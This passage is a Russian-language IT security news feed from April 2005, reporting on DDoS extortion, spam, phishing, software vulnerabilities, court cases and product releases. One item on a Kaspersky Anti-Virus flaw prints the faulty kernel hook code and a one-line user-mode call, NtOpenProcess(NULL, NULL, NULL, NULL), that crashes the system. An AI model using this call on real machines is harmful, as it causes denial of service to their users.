Представители британских онлайновых казино и букмекерских контор призывают интернет-провайдеров принять дополнительные меры, которые не позволят хакерам проводить DDoS-атаки, сообщает сайт ZDNet. «Многие провайдеры стали обращать внимание на проблему DDoS-атак. Одна из вещей, в которых мы пытаемся их убедить, – необходимость установки межсетевых экранов на машины клиентов», – заявил на лондонском конгрессе по интернет-преступлениям технический директор онлайновой букмекерской конторы Blue Square Питер Педерсен (Peter Pedersen). С помощью DDoS-атак хакеры выводят из строя серверы. Межсетевой экран, установленный провайдером, сможет контролировать пакеты исходящих данных и выявить, принимает ли компьютер участие в атаке. Blue Square – одна из многих онлайновых компаний, сталкивающихся с DDoS-атаками. За прекращение атак хакеры обычно требуют от владельцев коммерческих веб-ресурсов деньги. По словам Педерсена, в ходе атак на сайт Bluesq.com вымогатели передавали на сервер 1-2 гигабита в секунду. Такой поток данных занимал соединение сервера и замедлял работу сети провайдера. Педерсен обратил внимание на важность обмена информацией о DDoS-атаках с конкурентами: «Наша отрасль могла бы выступить единым фронтом. Я не могу выразить, насколько это важно».
Источник

10/04/2005 10:53 США признаны абсолютным мировым лидером по рассылке спама
Исследовательская компьютерная компания Sophos опубликовала результаты исследования текущей ситуации с проблемой спама в Интернете. Из документа следует, что более трети (35,7 процентов) всего мирового спама имеет американское происхождение. Второе место по количеству распространяемого спама занимает Южная Корея, откуда идет 24,98 процентов незапрошенной коммерческой корреспонденции. Третье место занимает Китай - на его долю приходится около 9,71 процентов спама. Далее в списке 12 самых злостных мировых спамеров (в формулировке Sophos "грязная дюжина") идут Франция, Испания и Канада (около 3 процентов), Япония и Бразилия (около 2 процентов), Великобритания, Германия, Австралия и Польша (около 1,5 процентов). Остальные страны в целом рассылают 11,73 процента мирового спама. Более половины всего спама распространяются с помощью "зомбированных" компьютеров, объединенных в спамерские "бот-сети". Это обычные пользовательские компьютеры, имеющие подключение к Интернету и захваченные посредством хакерских технологий. Как правило, такие технологии подразумевают захват машины втайне от ее хозяина (с помощью вирусов и "дыр" в ОС семейства Windows) и незаметное для владельцев использование ее в злоумышленных целях. Вместе с тем, наблюдается уменьшение количества спама наиболее распространенной тематики в связи с падающей его эффективностью. Как правило, это реклама порноресурсов, фальшивых медикаментов и "схем быстрого обогащения". Кроме того, отмечается эффективность мер, принимаемых провайдерами, устанавливающими на своих почтовых серверах антиспамерские фильтры.
Подробности

9/04/2005 15:45 Неудаляемые «куки» основаны на Macromedia Flash
Небольшая рекламная фирма, которая разрабатывает технологии для показа интернет-рекламы, заявила, что нашла способ бороться с пользователями, которые стирают файлы cookie на своем компьютере. С помощью cookie рекламные сети отслеживают серфинг пользователя в интернете и показывают ему таргетированную рекламу, постепенно накапливая информацию в личном профиле пользователя. Если он стирает шпионские файлы, то вся накопленная информация теряется, а отслеживание приходится начинать сначала. По мере распространения антишпионского софта такое происходит все чаще. По некоторым оценкам, до 40% пользователей периодически удаляют шпионские cookie со своего компьютера. Небольшая американская компания United Virtualities, которая специализируется на разработке технологий для слежения за пользователями в онлайне, объявила о том, что нашла решение этой проблемы. Теперь все удаленные cookie на компьютере пользователя можно восстановить. Для этого предлагается использовать специальную систему резервного копирования, основанную на элементе профилирования Local Shared Objects из комплекта Macromedia Flash. Все cookie на компьютере пользователя дублируются, а в случае удаления восстанавливаются. Система называется Persistent Identification Element (PIE), а файлы, по аналогии с cookies (в переводе с англ. — «печенья») разработчики называют pies («пироги»). На компьютере пользователя вместо обычного файла cookie записывается файл AccuCounter PIE, который выполняет те же функции. Одновременно с ним создается резервный Backup PIE, который восстанавливает основной AccuCounter PIE в том случае, если он оказался удаленным. Реализовать поддержку «неудаляемых куков» совсем несложно — достаточно вставить строчку кода в HTML-страницу. Компания United Virtualities планирует наладить сотрудничество со всеми издателями и рекламными сетями, которые заинтересованы в использовании новой технологии.
"Вебпланета"

9/04/2005 14:37 У британских спецслужб проблемы с компьютерами
Во-первых, они слишком дорогие. Во-вторых, они еще и полудохлые. Если верить опубликованному вчера докладу комитета по разведке и безопасности британского парламента, новая компьютерная система, разрабатываемая по заказу службы контрразведки МИ-5, будет стоить в полтора раза дороже, чем предусматривалось бюджетом. Более того, как сообщает журнал The Register, компьютерная сеть SCOPE, предназначенная для безопасной передачи секретной информации внутри спецслужбы, строится уже с трехлетним отставанием от утвержденного графика. И, наконец, составители отчета утверждают, что производительность указанной системы тоже будет, мягко говоря, не на высоте.
Internet.Ru

9/04/2005 14:14 Kaspersky Anti-Virus Web Scanner
"Лаборатория Касперского" сообщает о начале публичного бета-тестирования полноценного антивирусного веб-сканера Касперского, созданного на базе технологии ActiveX. Сканер позволяет любому посетителю сайта проверить свой компьютер на присутствие на нем червей, троянцев и любых других вредоносных программ. Все, кому это интересно, могут зарегистрироваться в разделе бета-тестирования корпоративного сайта компании и проверить работоспособность нового продукта самостоятельно.
Cтраница регистрации

9/04/2005 13:50 Штат Нью-Йорк запретит взламывать модемы
Законодатели штата Нью-Йорка представили законопроект, определяющий взлом модемов как преступление, сообщает Associated Press. Практика взлома модемов часто используется для совершения международных телефонных звонков. Если закон будет принят, телефонные компании и прокуроры смогут инициировать уголовные дела в отношении лиц, взламывающих модемы. Голосование по законопроекту должно состояться в конце июня. Обычно хакеры получают контроль над чужими модемами, завлекая пользователей на специальные сайты. Ссылка на такой сайт может содержаться, например, в электронном письме. Пользователи кликают на одну из призывно мигающих кнопок и таким образом устанавливают на свои компьютеры программы для модемов, которые позволяют хакерам звонить в другие города и страны. Счета за разговоры приходят владельцам модемов. «Это новый вид хищения и, чтобы с ним справиться, нужно принимать новые законы», — заявил один из авторов законопроекта. Одним из поводов для создания закона можно считать ряд жалоб от клиентов компании Verizon. Несколько ее клиентов полагают, что стали жертвами взлома модемов. По словам пресс-секретаря Verizon Клиффа Ли, специалисты дают пользователям советы, которые помогут избежать подобных преступлений. Например, клиентам рекомендуется пользоваться специальной телефонной линией для соединения с интернетом и заблокировать ее от международных звонков. Среди других методов защиты фигурирует установление межсетевых экранов и рекомендация не посещать незнакомые сайты. Законодательная инициатива штата Нью-Йорк — первый подобный проект в США, заявила Пэм Гринберг из Национальной конференции законодательных собраний штатов. Другие штаты принимают похожие законы, но они затрагивают более широкие аспекты и носят более общий характер.
VirusList

9/04/2005 13:24 Mandrakesoft меняет имя
Компания Mandrakesoft, производитель популярного в России и за рубежом дистрибутива Mandrakelinux, объявила о смене имени, сообщает linuxcenter.ru. Отныне и впредь она будет известна как Mandriva. Как сообщается, ребрендинг обусловлен слиянием с Connectiva, а также уходящим корнями в далекое прошлое спором с североамериканской фирмой Hearst Corporation по поводу торговой марки "Mandrake". Соответственно, дистрибутив Mandrakelinux теперь будет называться Mandriva Linux, Mandrakeclub превратится в Mandriva Club и т.п. Будут также зарегистрированы новые доменные имена: http://www.mandriva.com, http://www.mandrivalinux.com и другие.
Пресс-релиз компании

9/04/2005 12:17 Очередные патчи от Microsoft появятся 12 апреля
Как сообщает на сайте Microsoft в предварительном уведомлении (Microsoft Security Bulletin Advance Notification), 12 апреля компания выпустит очередную серию патчей для своих продуктов. Предполагается выпустить 8 бюллетеней безопасности. Пять из них будут содержать информацию об уязвимостях в Windows, в том числе сведения о критически опасных уязвимостях. Инсталляция некоторых апдейтов потребует последующей перезагрузки компьютера. Кроме того, критически опасные дыры обнаружены в пакете офисных программ Microsoft Office, интернет-пейджере MSN Messenger и почтовом сервере Microsoft Exchange. Также планируется выпустить обновленную модификацию бесплатной утилиты Titan. Это приложение предназначено для удаления наиболее опасных вредоносных программ, таких как Blaster, Sasser, MyDoom, DoomJuice, Zindos, Berweb/Download.Ject, Gailbot и Nachi. Утилиту Titan могут скачать все желающие через центр загрузок Microsoft, специальную веб-страницу, а также службу Windows Update и автоматические обновления. Кроме того, 12 апреля Microsoft представит два важных обновления для операционных систем Windows, не связанных с безопасностью.
Предварительное уведомление

9/04/2005 11:44 Киберпреступники изобрели новый способ мошенничества
Panda Software предупреждает пользователей о появлении нового вида онлайнового мошенничества. Компанией были обнаружены несколько сайтов, предлагавших пользователям дешевые авиабилеты. Однако настоящая цель этих веб-страниц - не продать что-либо, а заставить пользователей ввести данные своих кредитных карт, которые затем попадали в руки кибермошенников. Ничего не подозревающий пользователь ищет предложения авиабилетов в каком-либо поисковике и заходит на интернет-страницу, предлагающую дешевые перелеты. Сайт содержит форму, в которой пользователя просят ввести личные данные, включая номер кредитной карты, дату окончания действия и CVV-код. После того, как эти данные были введены, в целях продления иллюзии отображается страница об ошибке, сообщающая пользователю, что транзакция была неуспешной, и содержащая инструкции о том, как заплатить за билет почтовым переводом. В действительности это означает, что пользователь может пасть жертвой мошенничества дважды. Первый раз в результате отправки преступникам данных своей кредитной карты, с которой они могут выполнять все виды транзакций (переводы, платежи), а второй раз - потеряв деньги в случае оплаты требуемой суммы почтовым переводом.
Источник

9/04/2005 11:30 Российские хакеры — «лучшие в мире»
Полиция утверждает, что те россияне, которые когда-то занимались хакерством ради удовольствия, теперь объединяются с целью обогащения посредством киберпреступлений. Специализирующееся на киберпреступлениях подразделение российской милиции, известное как «Отдел К», заявило, что российские хакеры — лучшие в мире. «Всем известно, что русские сильны в математике, — заявил начальник „Отдела К“, генерал-лейтенант Борис Мирошников. — Наши программисты лучшие в мире, поэтому и наши хакеры лучшие в мире». Выступив во вторник на конференции e-Crime Congress в Лондоне, Мирошников рассказал, что вчерашние подростки, бессистемно промышлявшие хакерством, выросли и усовершенствовали свои методы. «Раньше этим занимались озорные мальчишки. Теперь они выросли. Они осознали, что если ты в чем-то хорошо разбираешься, ты должен использовать это, чтобы заработать на жизнь. Они стали хакерами и объединяются через сети, чтобы разбогатеть». Мирошников призвал к унификации международных законов об интернет-преступлениях, что облегчило бы блюстителям порядка всего мира проведение арестов и предъявление обвинений. Во вторник британское Национальное управление по преступлениям в сфере высоких технологий (NHTCU) сообщило, что в прошлом году киберпреступники причинили британским фирмам ущерб на сумму £2,4 млрд. Мирошников назвал это тревожным знаком, но заверил, что международные усилия полиции начинают приносить плоды. «Это очень тревожная статистика. Если взять 2001, 2002 и 2003 годы, то мы увидим, что количество компьютерных преступлений все время удваивалось. И только в этом году мы начали сдерживать их рост. Это результат нашей очень напряженной работы. «Когда правительство добивается кооперации ISP, правоохранительных органов, государственного и частного сектора, тогда, и только тогда, мы сможем сдержать рост преступности этого типа». Российских хакеров обвиняют в серии распределенных атак denial-of-service против британских веб-сайтов азартных игр, которые теперь призывают ISP обеспечить всех своих клиентов лучшей защитой.
ZDNet

9/04/2005 11:07 Sun критикует популярную лицензию open source
Президент Sun Microsystems Джонатан Шварц выразил горячую поддержку движению программного обеспечения open source, но раскритиковал широко используемую этим движением юридическую платформу General Public License. GPL управляет Linux и многими другими проектами в сфере свободного ПО и ПО с открытым исходным кодом. Однако ключевой принцип этой лицензии создает ситуацию, которая ведет к экономическому империализму, заявил Шварц во вторник на конференции Open Source Business Conference в Сан-Франциско. Естественно, Шварц предложил альтернативу: Sun Community Development и Distribution License, или CDDL, лицензию open source, которая представляет собой вариант более ранней Mozilla Public License (MPL). Sun начала распространять исходный код своей Solaris по CDDL в рамках проекта OpenSolaris. Теперь Solaris распространяется бесплатно, хотя услуги технической поддержки Sun продает. Шварц выделил пункт GPL, в котором говорится, что исходный код может смешиваться с другим кодом лишь в том случае, если этот другой код также управляется лицензией GPL. Этот пункт предназначен для создания фонда программного обеспечения, которое оставалось бы свободным от проприетарных ограничений. Но Шварц сказал, что некоторым людям, с которыми он говорил, это не нравится, так как не позволяет им использовать ПО open source в качестве основы для проприетарных проектов.
Более подробно

9/04/2005 10:06 Суд дал первому осужденному спамеру полный срок
Американский суд в штате Вирджиния вынес приговор по делу Джереми Джейнса (Jeremy Jaynes), который в прошлом году вместе со своими сообщниками был задержан властями США за рассылку большого количества спамерских сообщений, сообщает AP. Как было установлено следствием, Джейнс организовал фирму, которая была подключена к 16 высокоскростным интернет-каналам и рассылала около 10 миллионов спамерских писем ежедневно. По новому антиспамерскому законодательству США, это является достаточным основанием для того, чтобы посадить организатора подобной фирмы на срок до 9 лет. Этого и требовали обвинители в ходе слушаний, начавшихся в минувшем ноябре, и в пятницу суд согласился с их доводами, дав подсудимому именно этот срок. Тем не менее, приговор пока не будет приведен в исполнение, так как защита Джейнса намеревается подавать апелляцию. Дело Джейнса стало первым делом подобного рода, когда обвиняемый в рассылке спама злоумышленник предстал перед судом. Однако в настоящее время в американских следственных органах и судах на разных стадиях находится большое количество других дел против частных лиц и организаций, занимавшихся спамерскими рассылками.
Lenta.Ru

8/04/2005 17:01 Хакеры заманивают пользователей фальшивым письмом от имени Microsoft
В Интернете обнаружено созданное злоумышленниками электронное письмо, распространяющееся с помощью спамерских методов рассылки и сообщающее получателям о необходимости установить критические обновления для ОС Microsoft Windows. Как сообщает BBC News, письмо содержит заголовок "Urgent Windows Update" или "Important Windows Update" и содержит ссылку на хакерский сайт, который притворяется сайтом Microsoft Windows Update. Если позльзователь попал на этот сайт и согласился установить предлагаемые на нем "обновления системы", на его компьютер устанавливается вредоносная программа (вирус), которая позволяет хакерам получать над системой контроль и использовать зараженный компьютер в своих целях (как правило, это рассылка спама, организация DDoS-атак или дальнейшее распространение вируса). Microsoft и компании, специализирующиеся на компьютерной безопасности, призывают пользователей не реагировать на это письмо и ему подобные и не ходить по приведенным там ссылкам. Отмечается, что Microsoft никогда не рассылает писем пользователям с подобными инструкциями - о выходе критичных обновлений всегда сообщается через официальный сайт Microsoft и через СМИ, установка обновлений или производится в автоматическом режиме с официального сайта или по запросу пользователя, самостоятельно посетившего подлинный сайт Windows Update, расположенный по адресу http://windowsupdate.microsoft.com.
Подробности

8/04/2005 16:52 Обнаружена уязвимость в Антивирусе Касперского (KAV)
Как сообщает новостной канал "Антидеза" (он же Веб-лог Андэграунда), созданный и ведущийся ребятами из HangUP Team, давно известной своей "нелюбовью" как к самому Евгению Касперскому, так и к выпускаемому им продукту под названием "Антивирус Касперского" (он же KAV), элитные кодеры из ЛК допустили грубую ошибку в перехватчике вызова ZwOpenProcess. Перехватчик преследует цель сделать процесс антивируса неубиваемым и выглядит следующим образом:
NTSTATUS NewZwOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
if (ClientId->UniqueProcess == MyPid) return STATUS_ACCESS_DENIED;
else return RealZwOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
}
Казалось бы все верно, но в этом коде нет проверки указателя ClientID на валидность. Первая строка обращается к этому указателю напрямую без его проверки. Таким образом, передав в последнем параметре функции NtOpenProcess 0, мы получим синий экран. Для эксплойта уязвимости достаточно сделать следующий вызов под любыми правами в пользовательском режиме:
NtOpenProcess(NULL, NULL, NULL, NULL);
Как пишут ребята с "Антидезы": "Это не шутка, данный эксплойт теперь будут использовать в вирусах. Кстати, данный казус вполне подпадает под статью 273 УК "Создание вредоносного ПО". Компетентным органам стоит заняться расследованием и наказанием виновных".
Подробнее
Оригинал от автора уязвимости

8/04/2005 16:47 SIPfoundry открыла русскую Wiki-страницу для своих VoIP SIP проектов
Организация SIPfoundry, поддерживающая разработку VoIP SIP проектов с открытыми текстами (интернет-АТС, клиента SIP телефона для Windows и Linux, SIP стека reSIProcate и др.), недавно запустила русскую Wiki-страницу для обмена опытом и новостями между разработчиками и пользователями бесплатных программных продуктов для интернет-телефонии.
Cтраница

7/04/2005 10:44 Американский суд признал легитимным захват доменов в целях критики
Суд в Сан-Франциско разрешил местному жителю Майклу Кремеру (Michael Kremer) критиковать в Интернете услуги частной клиники Bosley Medical Institute, сообщает CNN. Кремер в 2000 году воспользовался услугами клиники для пересадки волос. Однако он остался неудовлетворен результатом и начал против клиники пропагандистскую кампанию, организовав для этого сайт с адресом www.bosleymedical.com. Клиника, сайт которой находится по адресу www.bosley.com, подала на Кремера в суд, заявляя, что он нарушает ее права на торговую марку, используя похожее доменное имя. Однако суд с этим не согласился, отметив, что сайт Кремера не предназначен для зарабатывания денег и не содержит ссылок на сайты конкурирующих фирм. Адвокат Кремера назвал это важной победой принципа свободы слова в Интернете. Вместе с тем, остается нерешенным вопрос о нарушении Кремером законодательства о киберсквоттинге (присовении доменов, эксплуатирующих торговые марки) - клиника Bosley утверждает, что Кремер пытался продать ей домен - слушания по этому пункту будут проводиться позже.
Подробности

5/04/2005 12:39 В финале чемпионата мира по программированию Россию представляют 12 команд
В китае проходит финал командного студенческого чемпионата мира по программированию (ICPC), который проводится Всемирной компьютерной ассоциацией (АСМ). Соревнования чемпионата АСМ являются наиболее престижными в мире интеллектуальными состязаниями молодых программистов и имеют почти тридцатилетнюю историю. ACM также известна тем, что выдает самую престижную награду в области высоких технологий - премию Тьюринга. В этом году в числе соревнующихся на ICPC будет 12 российских команд. Отмечается, что ни у одного полуфинального региона нет такого количества участников (всего 70 команд из 32 регионов, представители которых дошли до полуфинала). Поддержку россиян, участвующих в чемпионате, осуществляет крупнейшая российская ассоциация компаний-разработчиков программного обеспечения "Руссофт" и компания Rambler.
Российские команды, которые примут участие в ICPC-2005, представляют вузы СПбГУ ИТМО, МГУ, СПбГУ, Нижегородский ГУ, Уральский ГУ, Новосибирский ГУ, Саратовский ГУ, Пермский ГУ, Алтайский и Ижевский ГТУ, Уфимский авиационный ГТУ. Кроме того, в чемпионате участвует также команда Белорусского ГУ. В четвертьфинальных отборочных соревнованиях полуфинальной группы, где участвовали россияне, приняли участие 632 команд из 250 вузов, представлявших практически все ведущие классические и технические университеты России, а также университеты Азербайджана, Армении, Белоруссии, Гpузии, Казахстана, Киргизии, Латвии, Литвы, Узбекистана и Эстонии. Высшими достижениями российских команд в истории ICPC являются: звание абсолютных чемпионов мира 2004 года и золотые медали 1999, 2001, 2003 годов команд СПбГУ ИТМО, звания абсолютных чемпионов мира 2000 и 2001 годов и золотые медали 1998 года команд СПбГУ, золотая медаль 2003 года команды МГУ, золотая медаль 2004 года команды Пермского ГУ. Пожелаем и в этом году успеха нашим командам.
Источник

5/04/2005 12:37 Уязвимость в Mozilla
Secunia сообщает, что согласно баг-репорту Mozilla (https://bugzilla.mozilla.org/show_bug.cgi?id=288688) , в Mozilla Firefox 0.x и 1.x, Netscape 6.x-7.x также в Mozilla 0.x - 1.7.x присутствует неприятный баг, позволяющий удаленно получить конфиденциальную информацию с машины пользователя. Уязвимость возникла из-за ошибки в JavaScript машине; java script функция replace выделяя память из кучи процесса, раскрывает содержимое ранее использованных и не очищенных блоков памяти. На этой тестовой странице можно проверить уязвим ли ваш броузер. Пока баг не исправлен, рекоменуется отключить JavaScript.
Источник

4/04/2005 14:28 Уязвимость в teTeX
Несколько опасных уязвимостей обнаружено в пакете teTeX 2.x, которые могут быть использованы для проведения DoS атаки или получения удаленного доступа к машине пользователя. Данные уязвимости связаны с ранее обнаруженными уязвимостями в библиотеке libtiff, которую teTeX использует для работы с картинками. И хотя о них сообщалось довольно давно, уязвимости в teTeX присвоена высокая ("Highly critical") степень опасности из-за большой популярности этого текстового процессора, получившего широкое распространение. Официальный патч не выпущен. Однако некоторые Linux-производители ранее самостоятельно выпускали обновления для своих систем.
Secunia

4/04/2005 14:12 4 апреля — день покровителя интернета
Сегодня по католическому календарю День Святого Исидора — покровителя интернета и компьютеров. Католический Святой Исидор, епископ Севильский (560–636), получил известность благодаря любви к наукам, передает NewsProm.Ru. Он считается создателем энциклопедии «Этимология» в 20 книгах, в ней изложены сведения, которые должен знать образованный человек. Это грамматика, риторика, диалектика, арифметика, геометрия, астрономия, музыка, медицина, право и другие науки. В течение многих веков энциклопедия была для Европы сводом программных знаний. В 1999 году папа Иоанн Павел II официально назвал Святого Исидора покровителем пользователей компьютеров и интернета. Епископ был выдвинут в качестве соискателя на эту должность наряду со Святой Теклой и Святым Педро Регаладо и победил. Теперь именины Святого отмечают не только компьютерщики католических стран: многим исследователям интернета и знатокам компьютеров других религиозных конфессий приятно иметь своего покровителя.
Источник

4/04/2005 13:46 В Microsoft Jet database найдена уязвимость
В Microsoft Jet database найдена уязвимость, которая позволяет удаленному пользователю выполнить произвольный код в целевой системе. Уязвимость существует из-за ошибки обработки входных данных при обработке имен файлов баз данных в компоненте msjet40.dll. Удаленный пользователь может создать mdb-файл, который при открытии пользователем приведет к выполнению произвольного кода. Уязвима программа Microsoft Jet database msjet40.dll версия библиотеки 4.00.8618.0. «Дыра» имеет рейтинг опасности «высокая». Способов устранения уязвимости в настоящее время не существует.
CNews

4/04/2005 13:24 Авторы Bagle переключаются на банковские системы
В последнее время авторы почтового червя Bagle стали уделять больше внимания электронным банковским и платежным системам. В пяти новых обнаруженных нами творений от автора Bagle содержится шпионская троянская программа, предназначенная для сбора информации о нескольких сотнях банковских систем. Особенно интересно то, что авторы Bagle собирают информацию не об отдельных конкретных платежных системах (как поступает большинство схожих вредоносных программ), а сразу о нескольких сотнях (!) систем online-банкинга во многих странах мира, среди которых числятся Япония, Англия и США.
"Лаборатория Касперского"

4/04/2005 12:57 Новгородский суд рассмотрит дело интернет-мошенника
Суд Великого Новгорода предъявил обвинения в интернет-мошенничестве 38-летнему уроженцу Новосибирска Михаилу Кисилеву, сообщает РИА «Новости». Кисилев был арестован весной 2004 года в Санкт-Петербурге. В общей сложности ему инкриминируются 22 преступления по статье 159 (мошенничество) УК РФ. От имени вымышленных супружеских пар Мишеля и Ольги Ларсен (Франция), Анджея и Натали Валлет (Австрия), а также Павла Лескова и Натальи Шен (США) Кисиле вразместил на нескольких российских сайтах объявления о приеме на работу россиян на очень выгодных условиях. Для оформления документов, виз и страховых полисов Кисилев просил своих «клиентов» перечислять ему через систему интернет-платежей от 3 до 5 тысяч рублей. Криминальный бизнес был раскрыт сотрудниками новгородского отдела по борьбе с компьютерными преступлениями управления специальных технических мероприятий УВД Новгородской области. Ущерб, которые понесли потерпевшие от Кисилева, оценивается в 85 тысяч рублей. После задержания Киселева было установлено, что с 1999 года он находился в федеральном розыске. Отбывая в колонии-поселении срок за разбой, в 1999 году Кисилев скрылся.
Подробности

4/04/2005 12:35 Microsoft ополчилась против фишеров
Корпорация Microsoft в минувший четверг подала 117 исков против неназываемых владельцев сайтов, обвиняя их в фишинге, сообщает агентство Reuters. Юристы корпорации уверены, что владельцы веб-ресурсов использовали мошеннические схемы для кражи персональной информации пользователей. Исковые заявления поступили в окружной суд США в Вашингтоне, компания-истец намерена выявить связь между фишерами в разных странах мира и привлечь к ответственности злостных мошенников. В конце февраля было объявлено, что компани Microsoft, eBay и Visa USA заключили договор с частной антивирусной фирмой Whole Security. Совместными усилиями члены альянса будут бороться с фишерами: данные о мошенниках и о фишерских сайтах, собранные компаниями, будут собираться в единую базу данных. На основе этой базы подписчики антифишерского сервиса будут получать оповещения об атаках фишеров и обновления базы данных.
"Компьюлента"

4/04/2005 12:24 Очередные уязвимости в Internet Explorer и Outlook
Как сообщила исследовательская компания eEye Digital Security, в программах Microsoft Internet Explorer и Outlook обнаружен ряд новых особо опасных уязвимостей. Эти уязвимости позволяют злоумышленникам дистанционно исполнять программы на компьютерах пользователей без каких-либо действий с их стороны. Хотя самораспространяющиеся черви не могут проникнуть через эти дыры в систему, у атакующих есть возможность установить «троянцев» без ведома пользователя, предупреждает старший инженер eEye по безопасности Бен Надь: «Если пользователя заманят на сайт со злокачественным кодом, он может заразиться просто через банерную рекламу», — отметил он. Несколько дней назад eEye поставила Microsoft в известность об уязвимостях конфигураций по умолчанию Outlook и IE, предоставив софтверному гиганту время для выпуска патча, прежде чем обнародовать подробности о том, в каких версиях ПО они присутствуют. Сейчас на странице eEye, отведенной для будущих рекомендаций, деталей немного. Надь добавил, что eEye все еще проводит собственные испытания различных платформ, определяя, какие из них подвержены влиянию уязвимостей и в какой степени. О существовании каких-либо эксплойтов пока ничего не известно. «Microsoft признала, что уязвимость существует и она реальна, но я сомневаюсь, что они выпустят патч вне своего ежемесячного цикла», — сказал Надь. Между тем в Microsoft говорят, что там исследуют возможные уязвимости в Microsoft Windows, информацию о которых получили частным образом. «В настоящее время Microsoft не известно ни о каких атаках с попыткой использовать указанные уязвимости, и заказчики не почувствовали этой проблемы, — сказала представительница компании. — По завершению анализа Microsoft примет надлежащие меры для защиты своих заказчиков. В их число может входить предоставление исправлений через сервисный пакет либо в процессе нашего ежемесячного выпуска обновлений, либо с нарушением этого цикла — в зависимости от потребностей заказчиков».
Об уязвимостях

4/04/2005 11:19 Российские хакеры обчистили британских букмекеров на три миллиона долларов
В Следственном комитете при МВД России завершается расследование уголовного дела об атаке российских хакеров на британскую онлайновую букмекерскую контору Canbet Sport Bookmakers, пишет в понедельник "Коммерсант". По данным следователей, от действий хакеров пострадала не только эта компания, но и ряд других аналогичных фирм, общий ущерб которых оценивается в три миллиона долларов. Обвинения в рамках уголовного дела предъявлены жителю Петербурга Денису Степанову, саратовцу Ивану Максакову, а также безработным из Пятигорска Тимуру Арутчеву и Марии Зарубиной. Максаков, полностью признав свою вину, находится под подпиской о невыезде из Саратова. Степанов содержится в одном из московских СИЗО, а предполагаемые организаторы преступления Арутчев и Зарубина числятся в федеральном розыске. Как сообщалось ранее, в октябре 2003 года в Национальное управление по борьбе с преступлениями в сфере высоких технологий Великобритании (NHTCU) обратились руководители британской интернет-компании Canbet Sport Bookmakers. Их сайт подвергся атакам неких злоумышленников, которые, отправляя на сервер фирмы большое количество запросов, блокировали его работу. В результате клиенты компании обращались к другим букмекерам, а Canbet Sport Bookmakers ежедневно теряла из-за этого до 200 тысяч долларов. Для прекращения атак хакеры требовали от букмекеров, чтобы те перевели на счет в одном из латвийских банков 40 тысяч долларов. Англичане неоднократно отправляли деньги, но атаки на сайт не прекращались. Как оказалось, деньги из Латвии переводились в банки России, и британские полицейские обратились за помощью к российским коллегам. Тем удалось установить IP-адреса компьютеров злоумышленников и их провайдеров. Через них стали известны и имена подозреваемых, которые были задержаны 20 и 21 июля 2004 года. Ранее сообщалось, что всего в рамках этого дела были арестованы девять человек.
"Коммерсант"

4/04/2005 10:34 Иностранным программистам запретят крепить оборону США
Агентство передовых исследований Министерства обороны США (DARPA), которое занимается высокотехнологичными военными разработками, сокращает финансирование программ в университетах страны, сообщается на сайте газеты New York Times. По мнению военных чиновников, ученые слишком увлеклись фундаментальными разработками, которые воплотятся в жизнь через много лет, тогда как армии потребуется новое современное оружие уже в ближайшие годы. До последнего времени DARPA финансировало множество проектов, связанных, в частности, с компьютерными информационными технологиями во многих университетах США. Теперь число проектов будет значительно сокращено. По данным сенатского Комитета по Вооруженным силам, бюджет компьютерных разработок, которыми преимущественно занимались университеты, с 2001 по2004 год вырос с 546 миллионов долларов до 583 миллионов. Однако доля средств, выделенных университетам при этом сократилась с 214 миллионов долларов до 123 миллионов. Число программ, над которыми работают научные сотрудники, сократилось, но, как утверждают представители университетов, гораздо хуже то, что оставшиеся программы также подверглись структурным и кадровым изменениям. В силу того, что большинство исследований связаны с обеспечением обороноспособности страны, Пентагон решил запретить работать над этими программами иностранцам. Как утверждают ученые, это серьезно навредит научному прогрессу в сфере обороны, так как большинство программистов, которые трудятся в университетах, как раз являются гражданами других стран. "Это было феноменальной системой - использовать иностранную интеллектуальную рабочую силу в интересах страны... Мы должны быть максимально осторожными, переделывая ее", - заявил сказал бывший чиновник DARPA Дэвид Тенненхаус, который теперь является одним из руководителей компании Intel.
Подробности

4/04/2005 10:12 Выпущены PHP 5.0.4, PHP 4.3.11
На днях вышли новые версии PHP 5.0.4 и PHP 4.3.11. В новых релизах исправлены множественные ошибки обнаруженные ранее, некоторые из которых позволяют провести DoS-атаку. В частности, ошибки в функциях php_handle_iff()" и "php_handle_jpeg()", вызываемых из PHP функции "getimagesize()" при обработке специально сконструтрованной картинки могли привести к выполнению бесконечного цикла, что привело бы к исчерпыванию ресурсов CPU. Данная уязвимость присутствует в версиях 4.2.2, 4.3.9, 4.3.10, и 5.0.3. Другие ошибки, связанные с безопасностью и исправленные в данном релизе, касались exif и fbsql расширений и функций unserialize()" и "swf_definepoly()". Кроме того, исправлены другие многочисленные баги.
Подробности

3/04/2005 15:32 Microsoft вооружает полицию кибероружием
омпания Microsoft объявила о внедрении новых средств для борьбы с киберпреступлениями: фишингом, отмыванием денег и распространением детской порнографии. Специальный комплекс программ, представленный на семинаре по технической подготовке австралийских полицейских, получил название «Набор для компьютерных расследований и судебной информатики» (Forensic Computing and Computer Investigations Workshops), сообщает сайт ZDNet. По словам представителя Microsoft в Австралии и Новой Зеландии Грега Стоуна (Greg Stone), внедрение специального программного комплекса является частью глобальных усилий, направленных в помощь правоохранительным органам. С помощью «Набора» стражи порядка смогут понять технологии, используемые преступниками против бизнес-структур, правительственных организаций и граждан. Следующим шагом Microsoft будет совершенствование аналитических инструментов, которые облегчат работу следователей с «Набором», отметил Стоун. «Мы рассматриваем возможность предоставления наших внутренних аналитических инструментов правоохранительным органам. Я не говорю о коммерческих продуктах в упаковке, которые мы бы выпустили на рынок. Я говорю об очень специфических технологиях вроде искусственного интеллекта и информационной проходки, которые будут безопасны в руках компетентных специалистов», — заявил Стоун. Представитель Microsoft сообщил, что изначально средства, предоставленные полицейским, использовались программистами Microsoft для анализа кода на стадии разработки.
VirusList

3/04/2005 12:57 Выход первого сервис-пака к Windows 2003.
Microsoft выпустила первое крупное обновление (сервис-пак - SP1) для Server 2003. Как и в XP SP2, основной упор сделан на вопросы безопасности - обновлен файрволл, добавлен Security Configuration Wizard, позволяющий отключить лишние сервисы, Post-Setup Security Updates сразу после установки запрещает все входящие соединения до скачивания последних обновлений и настройки автообновления.
Подробности

3/04/2005 12:32 Торвальдс: «Пусть Linux тестируют чаще»
